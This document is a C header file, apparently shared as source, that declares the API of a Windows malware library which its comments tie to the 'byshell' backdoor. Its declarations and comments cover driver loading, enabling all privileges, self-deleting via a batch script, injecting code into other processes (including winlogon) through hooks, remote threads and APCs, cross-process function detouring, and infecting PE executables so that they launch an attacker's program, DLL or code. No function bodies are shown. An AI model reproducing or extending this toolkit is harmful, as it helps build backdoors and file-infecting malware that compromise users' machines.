usrlib.h

软件源代码,共享。有2个文件

/////////////////////////////////////////////////////////////////
//drvldr.cpp
//Dec 16 2005
DWORD drvldr_reg(char* drvname,DWORD start_type,char* path);
//path should be kernel type like \??\xxx
DWORD drvldr_load(char* drvname);
DWORD drvldr_stop(char* drvname);
DWORD drvldr_dereg(char* drvname);
BOOL piLoadDriverPrivilege(BOOL bEnable);

//////////////////////////////////////////////////////////////////
//rs.cpp
//Dec 26 05
//Aug 1 06 Patch FindResource module handle set to 0 just can deal with exe but not dll bug.
BOOL __stdcall release_rs_file(HMODULE module_base,char* rs_name,char* rs_type,char* filepath);
//March 14 2006
//Used in byshell v1.00 Loader's Parameter Configer.
BOOL __stdcall config_exefile_addtail(char* filepath,char* param,ULONG param_len);
BOOL __stdcall read_config_addtail(char* param,ULONG param_len);

///////////////////////////////////////////////////////////////////
//suicide.cpp
//Dec 26 2005
DWORD __stdcall suicide_bat(char* tmpbatname);
//end process and delete file by a bat script.
//if it returns errcode it failed :D

///////////////////////////////////////////////////////////////////
//remotecode.cpp
//Dec 27-30 2005  for byshell v1.00
DWORD __stdcall remotecode_hook(DWORD pid, void (__stdcall *code)(void*,char*),
								void* paramblock,int codesize,int paramblocksize);
//hook ZwWaitForSingleObject,ZwWaitForMultipleObjects,ZwDelayExecution,ZwYieldExecution
// to run our injected code (just explicit once, not thread). 
//code is a function which type is void __stdcall code(void*,char*);
//void* is param, char* is the event for you to signal after your work(not nessesary).
//code must be written in ASM and self-relocable.
//Note..this fuction cannot execute what you want on a sleeping/waiting process, 
//like winlogon with no action!


//Dec 30
DWORD __stdcall remotecode_CreateRemoteThread(DWORD pid, void (__stdcall *code)(void*),
								void* paramblock,int codesize,int paramblocksize);

//Jan 1-2 2006
DWORD __stdcall remotecode_userAPC(DWORD pid, void (__stdcall *code)(void*,void*,void*),
								void* paramblock,int codesize,int paramblocksize);
//this remote code may run several times. please use mutex!
//code has a type of VOID (NTAPI *)(PVOID ApcContext,PVOID Argument1, PVOID Argument2);
//but only Argument1 is valid for paramblock, other two are 0. 
//BUG Jan 12 2006 userAPC will cause alertable waiting thread abnormal resume. 
//May have a chance to cause a crash in target process, like in winlogon!
//Unstable code, be ware of to use.
//Untolerantable chance of making origin process to die! 
//Fuck PJF, write such article without enough test.

/////////////////////////////////////////////////////////////////////
//udetour.c
//Dec 27-29 2005  for byshell v1.00

//udetour:change from kdetourex Dec 27-28 2005
//But original Hookstru transfering cannot be used cuz the function is executed in other process.
//This function is quite complex with lots of mappings and relocs and pointers and different
//processes' address spaces.
//So it must need testing and pay attention to.
typedef struct u_hookstru{
	DWORD pid;
	int totallen;
	UCHAR ori[16];
	UCHAR* realaddr;
} U_hookstru,*pU_hookstru;

pU_hookstru __stdcall udetour(UCHAR* target,DWORD pid,
							  UCHAR* hooker_selfreloc_codeblock,int blocklen,
							  int transfering_area_offset,int code_entry_offset
							  );
	//hook no matter our or other process' function.
	//return callee allocated struct describing the hook while succeed,0 while failure
	//hooker function must be written in ASM self-reloc and has the same type of hooked function. 
	//hooker canNOT call pHookstruex->oritocall(...) to transfer call as in kdetour.
	//hooker code must have an area looked like at least 16+5 bytes of NOPs to transfer the call.
	//hooker call this area to transfer the call if want.
	//udetour will fill this area for you, by begining some copied target code and ending a jmp.
	//this area's offset and the actual function entry in the block should be specified.
	//note no pass an jmp_realaddr type address gened by VC as true address of hooker_selfreloc_codeblock.
DWORD __stdcall uundetour(pU_hookstru phk);
	//restore the target and free hinfo struct.

/////////////////////////////////////////////////////////////////////
//suspend.cpp
//Dec 27-29 2005
DWORD suspend_process(DWORD pid);
//suspend all threads in a specific process except my thread.
DWORD resume_process(DWORD pid);
//resume all threads in a specific process by one count except my thread.



/////////////////////////////////////////////////////////////////////
//privilege.cpp
//Dec 27 2005
BOOL piDebugPrivilege(BOOL bEnable);
//Jan 4 2005
//Enable specific privilege
BOOL EnableSpecificPrivilege(BOOL bEnable,char* Name);
//Jan 4 2005
//Enable all privilege, return num of privileges successfully enabled
DWORD EnableAllPrivilege(BOOL bEnable);


/////////////////////////////////////////////////////////////////////
//utility.cpp
//Dec 30 2005
DWORD findprocess(char* exename);
//with magic_qutoes_asp,ordered may 31 2005 with byshell067 beta2
//added to usrlib.
void* __stdcall memmem(const void *buf, const void *childbuf, 
					   unsigned int count ,unsigned int childcount);
//June 2nd,2005
//with byshell 0.67 beta2 to solve IIS6
void ABC2bin(BYTE* ABC,BYTE* bin,int ABClen);
void bin2ABC(BYTE* ABC,BYTE* bin,int binlen);

//Dec 30 2005
void gen_special_namestring(char* prefix,int len,char* output);
//genurate string like GUID, eg. BYEVENT0897654321 such thing.most length 32.
//len doNOT contain /0 end.

//Jan 5 2006
bool split_filename_str(IN char* str,IN int isbeginning_a_name,IN int namenum,IN OUT char** names);
//sprintf cannot split parameter as DOWN "c:\a and b\1.txt" d:\2.txt , sucks.
//split string and copy the substrings to caller buffer.


///////////////////////////////////////////////////////////////////
/*//self-reloc.cpp
//these function should be written into some reloc place and donot declare here!

//Dec 30
DWORD __stdcall searchexport(DWORD modbase,DWORD szexportname);
//copy from very early testing 'searchaddr' in 'PEinfect',self-reloc,case sensitive

//Dec 30-31
void* __stdcall searchmod(char* modname);
//self-reloc,rawmem searcher
//copied from very early testing 'searchaddr' in 'PEinfect'
//this product has failed in kmodexp cuz its SEH sucks :D
int __stdcall mystrincmp(char* s1,char* s2,int len);

*/

/////////////////////////////////////////////////////////////////////
//dllrtl.cpp
//Jan 5 2006
void dll_exit_clean(char* fullpath,int is_delfile);
//Dll thread end itself and FreeLibrary and optionally delete its file.

/////////////////////////////////////////////////////////////////////
//PEinfect.cpp
//Feb 12-14 2006.
//From 1.16,2005 code of infect
//Feb 13, three options tested successfully. 
//But there is a question that the searching code is too huge to inject.
//Feb 14 rewrite self-reloc rtl and thunkcode.
BOOL PE_thunk_infect(char* target_file,
				  char* OPTIONAL run_exe,char* OPTIONAL load_dll,
				  UCHAR* OPTIONAL custom_inject_code,int OPTIONAL len_custom_inject_code,
				  int OPTIONAL jmpstub_offset_custom_inject_code);
//This code can infect multi times until spare space exhausted.
//Three option can be select only one.
//target_file: The one you want to infect.
//run_exe: Name of exe to be executed when thunk runs.
//load_dll: Name of dll to be loaded when thunk runs.
//custom_inject_code: Your own thunk code.
//len_custom_inject_code: Length of Your own thunk code.
//jmpstub_offset_custom_inject_code: 0xe9 00000000 offset in custom_inject_code.

//Feb 14 2006
int is_my_PE_thunk_infect(char* target_file);
//1 for infected by my PE_thunk_infect, 0 for not, -1 for error. 
//check DOSheader+0x1c reserved bytes

//Feb 26 2006
BOOL is_PE_common(char* target_file);
//Check if a PE file is a common PE, not compressed, encypted or protected.
//These cases, infect will cause a crash.